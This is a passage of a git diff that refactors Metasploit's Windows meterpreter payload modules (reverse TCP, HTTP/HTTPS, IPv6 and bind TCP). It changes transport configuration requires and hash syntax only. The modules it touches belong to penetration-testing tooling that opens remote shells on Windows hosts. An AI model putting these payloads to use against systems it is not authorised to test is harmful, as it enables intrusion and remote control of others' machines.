@@ -46,20 +46,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_ipv6_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_ipv6_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 544bc8e525..62e36636f5 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit3 CachedSize = 906910 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader 
@@ -45,20 +45,20 @@ module Metasploit3 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block, which for staged connections is really simple. config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 14d4fddf75..6cc62752b0 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1128098 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 
@@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X64 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X64 + ) end # create the configuration block, which for staged connections is really simple. config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_bind_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_bind_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index dc4a34d6af..1ccc32812d 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/x64/meterpreter_loader' require 'msf/base/sessions/meterpreter_x64_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 1129142 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader_x64 
@@ -45,20 +45,20 @@ module Metasploit4
 def generate_config(opts={})
 unless opts[:uuid]
- opts[:uuid] = Msf::Payload::UUID.new({
- :platform => 'windows',
- :arch => ARCH_X64
- })
+ opts[:uuid] = Msf::Payload::UUID.new(
+ platform: 'windows',
+ arch: ARCH_X64
+ )
 end
 # create the configuration block
 config_opts = {
- :arch => opts[:uuid].arch,
- :exitfunk => datastore['EXITFUNC'],
- :expiration => datastore['SessionExpirationTimeout'].to_i,
- :uuid => opts[:uuid],
- :transports => [transport_config_reverse_http(opts)],
- :extensions => (datastore['EXTENSIONS'] || '').split(',')
+ arch: opts[:uuid].arch,
+ exitfunk: datastore['EXITFUNC'],
+ expiration: datastore['SessionExpirationTimeout'].to_i,
+ uuid: opts[:uuid],
+ transports: [transport_config_reverse_http(opts)],
+ extensions: (datastore['EXTENSIONS'] || '').split(',')
 }
 # create the configuration instance based off the parameters
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index d008d3f424..43132014c6 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -4,7 +4,7 @@
 ##
 require 'msf/core'
-require 'msf/core/transport_config'
+require 'msf/core/payload/transport_config'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/x64/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_x64_win'
@@ -15,7 +15,7 @@ module Metasploit4
 CachedSize = 1129142
- include Msf::TransportConfig
+ include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
 include Msf::Payload::Single
 include Msf::Payload::Windows::MeterpreterLoader_x64
@@ -45,20 +45,20 @@ module Metasploit4
 def generate_config(opts={})
 unless opts[:uuid]
- opts[:uuid] = Msf::Payload::UUID.new({
- :platform => 'windows',
- :arch => ARCH_X64
- })
+ opts[:uuid] = Msf::Payload::UUID.new(
+ platform: 'windows',
+ arch: ARCH_X64
+ )
 end
 # create the configuration block
 config_opts = {
- :arch => opts[:uuid].arch,
- :exitfunk => datastore['EXITFUNC'],
- :expiration => datastore['SessionExpirationTimeout'].to_i,
- :uuid => opts[:uuid],
- :transports => [transport_config_reverse_http(opts)],
- :extensions => (datastore['EXTENSIONS'] || '').split(',')
+ arch: opts[:uuid].arch,
+ exitfunk: datastore['EXITFUNC'],
+ expiration: datastore['SessionExpirationTimeout'].to_i,
+ uuid: opts[:uuid],
+ transports: [transport_config_reverse_http(opts)],
+ extensions: (datastore['EXTENSIONS'] || '').split(',')
 }
 # create the configuration instance based off the parameters
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index 20948a1076..fb46f4329d 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -4,7 +4,7 @@
 ##
 require 'msf/core'
-require 'msf/core/transport_config'
+require 'msf/core/payload/transport_config'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/x64/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_x64_win'
@@ -15,7 +15,7 @@ module Metasploit4
 CachedSize = 1128098
- include Msf::TransportConfig
+ include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
 include Msf::Payload::Single
 include Msf::Payload::Windows::MeterpreterLoader_x64
@@ -46,20 +46,20 @@ module Metasploit4
 def generate_config(opts={})
 unless opts[:uuid]
- opts[:uuid] = Msf::Payload::UUID.new({
- :platform => 'windows',
- :arch => ARCH_X64
- })
+ opts[:uuid] = Msf::Payload::UUID.new(
+ platform: 'windows',
+ arch: ARCH_X64
+ )
 end
 # create the configuration block
 config_opts = {
- :arch => opts[:uuid].arch,
- :exitfunk => datastore['EXITFUNC'],
- :expiration => datastore['SessionExpirationTimeout'].to_i,
- :uuid => opts[:uuid],
- :transports => [transport_config_reverse_ipv6_tcp(opts)],
- :extensions => (datastore['EXTENSIONS'] || '').split(',')
+ arch: opts[:uuid].arch,
+ exitfunk: datastore['EXITFUNC'],
+ expiration: datastore['SessionExpirationTimeout'].to_i,
+ uuid: opts[:uuid],
+ transports: [transport_config_reverse_ipv6_tcp(opts)],
+ extensions: (datastore['EXTENSIONS'] || '').split(',')
 }
 # create the configuration instance based off the parameters
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 84a9f32fc5..0f732aebca 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-require 'msf/core/transport_config'
+require 'msf/core/payload/transport_config'
 require 'msf/core/payload/windows/x64/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_x64_win'
 require 'msf/base/sessions/meterpreter_options'
@@ -15,7 +15,7 @@ module Metasploit4
 CachedSize = 1128098
- include Msf::TransportConfig
+ include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
 include Msf::Payload::Single
 include Msf::Payload::Windows::MeterpreterLoader_x64
@@ -45,20 +45,20 @@ module Metasploit4
 def generate_config(opts={})
 unless opts[:uuid]
- opts[:uuid] = Msf::Payload::UUID.new({
- :platform => 'windows',
- :arch => ARCH_X64
- })
+ opts[:uuid] = Msf::Payload::UUID.new(
+ platform: 'windows',
+ arch: ARCH_X64
+ )
 end
 # create the configuration block
 config_opts = {
- :arch => opts[:uuid].arch,
- :exitfunk => datastore['EXITFUNC'],
- :expiration => datastore['SessionExpirationTimeout'].to_i,
- :uuid => opts[:uuid],
- :transports => [transport_config_reverse_tcp(opts)],
- :extensions => (datastore['EXTENSIONS'] || '').split(',')
+ arch: opts[:uuid].arch,
+ exitfunk: datastore['EXITFUNC'],
+ expiration: datastore['SessionExpirationTimeout'].to_i,
+ uuid: opts[:uuid],
+ transports: [transport_config_reverse_tcp(opts)],
+ extensions: (datastore['EXTENSIONS'] || '').split(',')
 }
 # create the configuration instance based off the parameters